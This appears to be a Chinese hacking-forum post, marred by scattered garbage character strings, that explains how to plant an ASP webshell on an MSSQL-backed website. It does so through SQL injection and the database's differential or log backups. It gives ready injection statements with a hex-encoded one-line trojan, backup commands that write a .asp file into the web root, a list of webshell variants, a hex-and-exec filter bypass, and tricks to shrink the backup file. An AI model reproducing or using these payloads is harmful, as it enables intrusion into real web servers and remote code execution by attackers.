MSsql差异备份总结

admin

差异备份的流程大概这样：
' W3 T1 e6 u3 g/ T1.完整备份一次(保存位置当然可以改)
backup database 库名 to disk = 'c:\ddd.bak';--
3 p+ X; C2 I# u& }
+ c" M/ y/ ?% g' Q  d7 J/ x2.创建表并插曲入数据
% @& b9 Y) v7 x. I$ q  \create table [dbo].[dtest] ([cmd] [image]);
* {7 q5 f, E$ H$ l+ G; einsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
# }( P- m- R; U
4 `, d6 j8 j4 O" e& \; Y/ a4 t3 M3.进行差异备份
  g/ ^/ Q; k7 \- V& K% vbackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
1 ]6 r5 i' m, f' ^
上面
* G3 t6 U2 j) r; n. J; i9 C0x3C25657865637574652872657175657374282261222929253E
就是一句话木马的内容：<%execute(request("a"))%>
. M0 d& G$ A) F! `4 N2 M
- j. X. ]7 f) Y' O* g; ~& `如下是网上常见的差异备份代码，思路一样！
===================================================
4 V4 d  g/ G$ N8 W) Y利用差异备份提高提高backupwebshell的成功率,减少文件大小
) w& ]1 I( D0 Q* ^$ R' D  f; R# N3 Y步骤:

' x' t- A. X1 |' u  o4 D- \# `declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库
: |' V3 v$ L8 |, i- d5 U* @9 d  \
) r2 o7 ]: t; ]8 ~create table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表


insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中

" o* b# {9 l8 [5 U' ydeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份
' F& R; w7 L' l3 @" M3 v1 C
drop table [xiaolu]  -- 删除此表。
4 f0 W) k7 e! n4 F
0x77006F006B0061006F002E00620061006B00为wokao.bak
% I8 O: c4 w+ k4 v$ B+ L; C8 [0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
. u2 c  o/ l- Q3 C9 b3 B
声明：方法不是我想的，我只是写工具，默认得到shell是
<%execute(request("a"))%>
3 z6 P: N" \- l, n1 S4 X9 a( S8 g3 G+ g===============================================================

8 S. t. k8 L4 \我发现上面代码，有时会无效，而直接用
1 L% q0 v+ J! M6 W; e" u2 {, o: C
backup database 库名 to disk = 'c:\ddd.bak'
$ w) c7 _7 R# i$ b  a
0 B- Z. A/ ~% `* a% n0 c% Ycreate table [dbo].[dtest] ([cmd] [image]);

  }2 ^" ^+ h, zinsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
1 Y5 r! t2 m% E
backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
; G# M/ s2 l1 [  z7 Z
3 D1 e0 D4 W$ J$ C8 g: ~却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！

库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！
* |) I4 p& k* [+ Y: O
网上还有log增量备份的，我也把他记录一下
7 d0 T( f+ P) D! x! z7 g" ~3 X) o; k=====================================================
另一种log增量备份技术:

+ G1 b$ e# o5 |3 o; D# S6 |7 m';alter database null set RECOVERY FULL--

';create table cmd (a image)--

';backup log null to disk = 'f:\cmd' with init--

6 Z3 `3 ]* T% b9 G( u) a2 A';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--

- I( h, V; _' R. H4 a';backup log null to disk = '备份路径'--
  c4 r/ Y  e4 m$ S5 o1 e! u2 w
; \" D2 X6 R5 S* Q';drop table cmd--
6 B% R! P5 r8 F; q
: S, A1 w. E3 a# N& O3 k';alter database XXX set RECOVERY SIMPLE--
' X. G/ O& b, a; ?1 g  i9 O! G
1 q' m- h( V' O9 e5 ZPS:0x3C2565786563757465287265717565737428226122292
9253EDA 是一句话小马16进制转来的

说到一句话马，还可以有这么几种写法：
9 I6 y6 H% @* ]& |' i: ^4 w) q
a)<%%25Execute(request("a"))%%25>
b)<%Execute(request("a"))%>
  @, A- Q" F2 }& ~2 D! ac)%><%execute request("a")%><%
/ I" J/ }9 n/ X# O5 L, i' a- v# O* Wd)<script language=VBScript runat=server>execute request("a")</script>
e)<%25Execute(request("a"))%25>
6 V$ h4 t$ \; R. ^/ H8 A1 ^f)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
g)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
1 a$ Q: M. p. Q! q1 G9 bh)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
I)<%eval request(0)%>
J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话
4 w! p) k; s: [  w* N8 o
=============================================
& G8 _) W. [& y! k7 [4 y9 W
, Z" B1 m- T" m& f当遇到差备过滤了/时用这个语句代替
" x4 t* X( U* g+ ?6 v) w
, ~8 x+ U/ {" H& N4 ]% y& vdeclare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--
0 j( l/ U( m+ @( ?$ f( p% ^# k" j
) x4 a! M! e3 r. C2 a5 C. ~: E' a* M把要执行的语句转16进制然后用exec执行
3 z8 P3 _6 ]5 l5 M* d6 S
. R+ b) h1 f4 T, _& c
0 ^: Z5 L0 d  t$ Q7 c减少备份文件大小方法如下:
! V5 w! u# J# ]& G3 q# @
: O1 `1 k: `$ T$ L总的来说就是那么简单几句,下面以备份数据库model为例子
1
& _, t# [# d( ]4 vid=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
2
id=1;backup database model to disk='你的路径‘ with differential,format;--

9 L0 u+ R6 X0 c

SQL语句清理日志
注：test为数据库名
, N$ b  p% f; j$ [5 i1 |
--清空日志
1 r5 o/ V* {, d6 R/ sDUMP TRANSACTION test WITH NO_LOG

/ n( E5 V% o$ S9 j& N" |0 D- F--截断事务日志
BACKUP LOG test WITH NO_LOG
% Q, W2 S' o* Q/ X- g! n
; e( J$ m4 D& p5 h; n--收缩数据库
DBCC SHRINKDATABASE(test)

--收缩指定数据文件,1是文件号,可以通过这个语句查询到
6 P: C* c! |0 [. n3 u/ m* F1 ASelect * from sysfiles DBCC SHRINKFILE(1)
# U/ l6 E! n+ M( w
6 I1 D8 D* Z, ~, q( C--以后能自动收缩
8 I2 h8 d' e4 z3 R1 `: f  t, WEXEC sp_dboption 'test', 'autoshrink', 'TRUE'